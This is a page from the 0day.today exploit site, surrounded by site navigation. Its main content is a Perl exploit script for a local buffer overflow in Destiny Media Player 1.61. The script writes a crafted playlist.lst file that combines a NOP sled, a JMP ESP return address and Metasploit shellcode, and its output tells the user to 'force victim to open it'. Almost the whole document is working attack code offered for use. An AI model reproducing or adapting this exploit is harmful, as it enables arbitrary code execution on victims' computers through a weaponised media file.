0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Destiny Media Player 1.61 (lst File) Local Buffer Overflow Exploit #2
===================================================================== Destiny Media Player 1.61 (lst File) Local Buffer Overflow Exploit #2 ===================================================================== #!/user/bin/perl #Destiny Media Player 1.61 Local BoF Code #Exploit Coded by : sCORPINo #Snoop Security Researching Committe #originally discovered by: Encrypt3d.M!nd # windows/exec - 142 bytes # http://www.metasploit.com # Encoder: x86/fnstenv_mov # EXITFUNC=thread, CMD=calc $shellcode = "\x6a\x1e\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x64" . "\xfc\xb1\x5d\x83\xeb\xfc\xe2\xf4\x98\x14\xf5\x5d\x64\xfc" . "\x3a\x18\x58\x77\xcd\x58\x1c\xfd\x5e\xd6\x2b\xe4\x3a\x02" . "\x44\xfd\x5a\x14\xef\xc8\x3a\x5c\x8a\xcd\x71\xc4\xc8\x78" . "\x71\x29\x63\x3d\x7b\x50\x65\x3e\x5a\xa9\x5f\xa8\x95\x59" . "\x11\x19\x3a\x02\x40\xfd\x5a\x3b\xef\xf0\xfa\xd6\x3b\xe0" . "\xb0\xb6\xef\xe0\x3a\x5c\x8f\x75\xed\x79\x60\x3f\xee\x6c" . "\x92\x9c\xe7\x39\xef\xba\x81\xd6\x24\xf0\x3a\x2d\x78\x51" . "\x3a\x35\x6c\x75\x49\xde\xa4\x96\xe1\x35\x8b\x32\x51\x3d" . "\x0c\x64\x4f\xd7\x6a\xab\x4e\xba\x07\x9d\xdd\x3e\x64\xfc" . "\xb1\x5d"; $nops = "\x90" x 2052; #fill the buffer $nops2 = "\x90" x 100; #fill the buffer more:p $eip = "\x65\x82\xA5\x7c"; #7CA58265 JMP ESP $attack = $nops.$eip.$nops.$shellcode; #sandwich $playlist="playlist.lst"; #playlist name,chage it to anything you want intro(); open($FILE, ">$playlist"); print $FILE $attack; close($FILE); print "\n\n\n$playlist created beside this exploit.\n"; print "force victim to open it with Destiny Media Player 1.61\n"; print "good luck\n\n"; sub intro{ print qq( ############################################################ ## Snoop Security Researching Committe ## ## www.snoop-security.com ## ## sCORPINo ## ## just run and open the playlist.lst with ## ## Destiny Media Player.then BOOM ! ## ############################################################ ); } # 0day.today [2024-07-02] #